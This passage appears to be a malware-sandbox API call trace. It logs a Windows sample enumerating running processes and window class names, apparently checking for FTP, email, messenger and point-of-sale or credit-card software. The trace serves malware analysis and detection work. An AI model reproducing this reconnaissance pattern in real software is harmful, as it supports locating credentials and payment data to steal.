lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0097.213] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0097.215] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0097.217] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0097.220] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0097.222] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xba8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0097.224] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0097.226] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbbc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0097.229] Process32Next (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x390, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0107.344] Process32First (in: hSnapshot=0x1500, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0122.098] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x560 [0122.114] Process32First (in: hSnapshot=0x560, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0122.699] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x14f4 [0122.714] Process32First (in: hSnapshot=0x14f4, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0128.734] Process32First (in: hSnapshot=0x155c, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0133.165] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xc80 [0133.176] Process32First (in: hSnapshot=0xc80, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0146.212] Process32First (in: hSnapshot=0x1528, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0170.147] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xd00 [0170.163] Process32First (in: hSnapshot=0xd00, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0187.108] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x12e0 [0187.120] Process32First (in: hSnapshot=0x12e0, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0191.585] Process32First (in: hSnapshot=0x12e0, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0205.846] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1138 [0205.863] Process32First (in: hSnapshot=0x1138, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0207.279] Process32First (in: hSnapshot=0x12dc, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0220.787] Process32First (in: hSnapshot=0x24c, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0235.198] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x6c8 [0235.207] Process32First (in: hSnapshot=0x6c8, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0236.171] Process32First (in: hSnapshot=0x41c, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0257.460] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1534 [0257.467] Process32First (in: hSnapshot=0x1534, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0258.838] Process32First (in: hSnapshot=0x1534, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0260.881] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1534 [0260.893] Process32First (in: hSnapshot=0x1534, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0262.261] Process32First (in: hSnapshot=0x1534, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0264.355] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1534 [0264.363] Process32First (in: hSnapshot=0x1534, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0269.002] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xa20 [0269.010] Process32First (in: hSnapshot=0xa20, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0282.575] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1140 [0282.664] Process32First (in: hSnapshot=0x1140, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0286.166] Process32First (in: hSnapshot=0xa9c, lppe=0x7c3fca0 | out: lppe=0x7c3fca0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 Thread: id = 41 os_tid = 0xea8 [0096.285] EnumWindows (lpEnumFunc=0x3a13dd0, lParam=0x27a0000) returned 1 [0096.287] GetClassNameA (in: hWnd=0x30122, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="TaskSwitcherWnd") returned 15 [0096.287] GetClassNameA (in: hWnd=0x40146, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0096.287] GetClassNameA (in: hWnd=0x300b0, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0096.287] GetClassNameA (in: hWnd=0x400a4, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0096.287] GetClassNameA (in: hWnd=0x101ce, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="SysFader") returned 8 [0096.287] GetClassNameA (in: hWnd=0x1012a, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="ATL:000007FEF43852C0") returned 20 [0096.287] GetClassNameA (in: hWnd=0x10070, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0096.287] GetClassNameA (in: hWnd=0x1006e, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0096.287] GetClassNameA (in: hWnd=0x1005a, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0096.287] GetClassNameA (in: hWnd=0x10086, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0096.287] GetClassNameA (in: hWnd=0x10078, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0096.287] GetClassNameA (in: hWnd=0x10076, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0096.288] GetClassNameA (in: hWnd=0x10072, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0096.288] GetClassNameA (in: hWnd=0x10052, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="Button") returned 6 [0096.288] GetClassNameA (in: hWnd=0x1004e, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="Shell_TrayWnd") returned 13 [0096.288] GetClassNameA (in: hWnd=0x100ee, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0096.288] GetClassNameA (in: hWnd=0x50092, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0096.288] GetClassNameA (in: hWnd=0x10088, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="TaskListThumbnailWnd") returned 20 [0096.288] GetClassNameA (in: hWnd=0x1029a, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="Movie_win") returned 9 [0096.288] GetClassNameA (in: hWnd=0x8009c, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="DV2ControlHost") returned 14 [0096.288] GetClassNameA (in: hWnd=0x10238, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="icq") returned 3 [0096.288] GetClassNameA (in: hWnd=0x10256, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="accupos_win") returned 11 [0096.288] GetClassNameA (in: hWnd=0x10254, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="winscp") returned 6 [0096.288] GetClassNameA (in: hWnd=0x10252, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="scriptftpwnd") returned 12 [0096.288] GetClassNameA (in: hWnd=0x10250, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="pidgin_wnd") returned 10 [0096.288] GetClassNameA (in: hWnd=0x1024e, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="centralcreditcard_window") returned 24 [0096.289] GetClassNameA (in: hWnd=0x1024c, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="ccv_serverwin") returned 13 [0096.289] GetClassNameA (in: hWnd=0x1022c, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="3dftp_cls") returned 9 [0096.289] GetClassNameA (in: hWnd=0x102a4, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="omnipos") returned 7 [0096.289] GetClassNameA (in: hWnd=0x102a2, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="fpos_") returned 5 [0096.289] GetClassNameA (in: hWnd=0x102a0, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="edcsvrapp") returned 9 [0096.289] GetClassNameA (in: hWnd=0x400a6, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0096.289] GetClassNameA (in: hWnd=0x300b8, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="AUTHUI.DLL: Shutdown Choices Message Window") returned 43 [0096.289] GetClassNameA (in: hWnd=0x300de, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="_SearchEditBoxFakeWindow") returned 24 [0096.289] GetClassNameA (in: hWnd=0x300c4, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0096.289] GetClassNameA (in: hWnd=0x300f2, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0096.289] GetClassNameA (in: hWnd=0x400ae, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0096.289] GetClassNameA (in: hWnd=0x300a2, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="Desktop User Picture") returned 20 [0096.289] GetClassNameA (in: hWnd=0x10298, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="isspos_wnd") returned 10 [0096.290] GetClassNameA (in: hWnd=0x10294, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="BookStyleactuallywin") returned 20 [0096.290] GetClassNameA (in: hWnd=0x10284, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="store_window") returned 12 [0096.290] GetClassNameA (in: hWnd=0x10258, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="aldelo") returned 6 [0096.290] GetClassNameA (in: hWnd=0x1027c, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="smartftp") returned 8 [0096.290] GetClassNameA (in: hWnd=0x10278, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="fling_class") returned 11 [0096.290] GetClassNameA (in: hWnd=0x10276, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="utg2_") returned 5 [0096.290] GetClassNameA (in: hWnd=0x10274, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="ncftpwindow") returned 11 [0096.290] GetClassNameA (in: hWnd=0x10272, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="active-chargewnd") returned 16 [0096.290] GetClassNameA (in: hWnd=0x10270, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="yahoomessenger_cls") returned 18 [0096.290] GetClassNameA (in: hWnd=0x1026e, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="whatsapp_window") returned 15 [0096.290] GetClassNameA (in: hWnd=0x1026c, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="webdrive_cls") returned 12 [0096.290] GetClassNameA (in: hWnd=0x1026a, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="trillian") returned 8 [0096.290] GetClassNameA (in: hWnd=0x10268, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="operamail_wnd") returned 13 [0096.290] GetClassNameA (in: hWnd=0x10266, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="leechftpcls") returned 11 [0096.290] GetClassNameA (in: hWnd=0x10264, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="thunderbird_win") returned 15 [0096.291] GetClassNameA (in: hWnd=0x10262, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="outlookwindow") returned 13 [0096.291] GetClassNameA (in: hWnd=0x10260, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="notepadcls") returned 10 [0096.291] GetClassNameA (in: hWnd=0x1025e, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="coreftpwin") returned 10 [0096.291] GetClassNameA (in: hWnd=0x1025c, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="farclass") returned 8 [0096.291] GetClassNameA (in: hWnd=0x1025a, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="bitkinexapp") returned 11 [0096.291] GetClassNameA (in: hWnd=0x1024a, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="skype") returned 5 [0096.291] GetClassNameA (in: hWnd=0x1027e, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="allowSurestillwnd") returned 17 [0096.291] GetClassNameA (in: hWnd=0x10230, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="afr38") returned 5 [0096.291] GetClassNameA (in: hWnd=0x1022e, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="creditservicecls") returned 16 [0096.291] GetClassNameA (in: hWnd=0x1023a, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="foxmailincmail_cls") returned 18 [0096.291] GetClassNameA (in: hWnd=0x10246, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="mxslipstream_") returned 13 [0096.291] GetClassNameA (in: hWnd=0x10244, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="flashfxp_win") returned 12 [0096.291] GetClassNameA (in: hWnd=0x10242, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="filezilla_") returned 10 [0096.292] GetClassNameA (in: hWnd=0x10240, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="barcaapp") returned 8 [0096.292] GetClassNameA (in: hWnd=0x1023e, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="alftp_window") returned 12 [0096.292] GetClassNameA (in: hWnd=0x1023c, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="gmailnotifierpro_win") returned 20 [0096.292] GetClassNameA (in: hWnd=0x1027a, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="languageWantcls") returned 15 [0096.292] GetClassNameA (in: hWnd=0x10236, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="spcwin_wnd") returned 10 [0096.292] GetClassNameA (in: hWnd=0x10232, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="absolutetelnetcls") returned 17 [0096.292] GetClassNameA (in: hWnd=0x10234, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="spgagentservice_app") returned 19 [0096.292] GetClassNameA (in: hWnd=0x101ec, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="lawyer_check_practice_wnd") returned 25 [0096.292] GetClassNameA (in: hWnd=0x1020a, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="CouldTeam") returned 9 [0096.292] GetClassNameA (in: hWnd=0x101fa, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="Condition") returned 9 [0096.292] GetClassNameA (in: hWnd=0x10208, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="special_Avoid_Share_cls") returned 23 [0096.292] GetClassNameA (in: hWnd=0x101f8, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="Stagewnd") returned 8 [0096.293] GetClassNameA (in: hWnd=0x10206, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="collection_win") returned 14 [0096.293] GetClassNameA (in: hWnd=0x10204, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="none_class") returned 10 [0096.293] GetClassNameA (in: hWnd=0x10202, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="central_rule_win") returned 16 [0096.293] GetClassNameA (in: hWnd=0x10200, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="Perform_wnd") returned 11 [0096.293] GetClassNameA (in: hWnd=0x101fe, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="which_cls") returned 9 [0096.293] GetClassNameA (in: hWnd=0x101fc, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="Property_step_window") returned 20 [0096.293] GetClassNameA (in: hWnd=0x101f6, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="Deepapp") returned 7 [0096.293] GetClassNameA (in: hWnd=0x101f4, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="Candidate_coach_app") returned 19 [0096.293] GetClassNameA (in: hWnd=0x101f2, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="moveclass") returned 9 [0096.294] GetClassNameA (in: hWnd=0x101ea, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="rulenightwnd") returned 12 [0096.294] GetClassNameA (in: hWnd=0x301e0, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0096.295] GetClassNameA (in: hWnd=0x101aa, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0096.295] GetClassNameA (in: hWnd=0x1019e, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0096.295] GetClassNameA (in: hWnd=0x10182, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0096.295] GetClassNameA (in: hWnd=0x10180, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0096.295] GetClassNameA (in: hWnd=0x1017a, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0096.295] GetClassNameA (in: hWnd=0x10170, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0096.295] GetClassNameA (in: hWnd=0x1016e, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="tooltips_class32") returned 16 [0096.295] GetClassNameA (in: hWnd=0x10152, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="IEFrame") returned 7 [0096.295] GetClassNameA (in: hWnd=0x101e8, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0096.295] GetClassNameA (in: hWnd=0x101e2, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="TabThumbnailWindow") returned 18 [0096.295] GetClassNameA (in: hWnd=0x201de, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="Internet Explorer_Hidden") returned 24 [0096.296] GetClassNameA (in: hWnd=0x101d2, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="ATL:733658F8") returned 12 [0096.296] GetClassNameA (in: hWnd=0x101be, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0096.296] GetClassNameA (in: hWnd=0x101bc, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0096.296] GetClassNameA (in: hWnd=0x101b4, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0096.296] GetClassNameA (in: hWnd=0x101a6, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="OleDdeWndClass") returned 14 [0096.296] GetClassNameA (in: hWnd=0x10158, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="DDEMLEvent") returned 10 [0096.296] GetClassNameA (in: hWnd=0x10154, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="DDEMLMom") returned 8 [0096.296] GetClassNameA (in: hWnd=0x10150, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0096.296] GetClassNameA (in: hWnd=0x20140, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="FaxMonWinClass{3FD224BA-8556-47fb-B260-3E451BAE2793}") returned 52 [0096.296] GetClassNameA (in: hWnd=0x10134, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="BluetoothNotificationAreaIconWindowClass") returned 40 [0096.297] GetClassNameA (in: hWnd=0x10132, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="MS_WebcheckMonitor") returned 18 [0096.297] GetClassNameA (in: hWnd=0x20128, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="PNIHiddenWnd") returned 12 [0096.297] GetClassNameA (in: hWnd=0x1011c, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="Media Center SSO") returned 16 [0096.297] GetClassNameA (in: hWnd=0x10114, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="ATL:000007FEFBCD41F0") returned 20 [0096.297] GetClassNameA (in: hWnd=0x1010a, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="SystemTray_Main") returned 15 [0096.297] GetClassNameA (in: hWnd=0x10108, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0096.297] GetClassNameA (in: hWnd=0x60094, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="COMTASKSWINDOWCLASS") returned 19 [0096.297] GetClassNameA (in: hWnd=0x10100, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 [0096.297] GetClassNameA (in: hWnd=0x100fa, lpClassName=0x5d7fbe0, nMaxCount=260 | out: lpClassName="WorkerW") returned 7 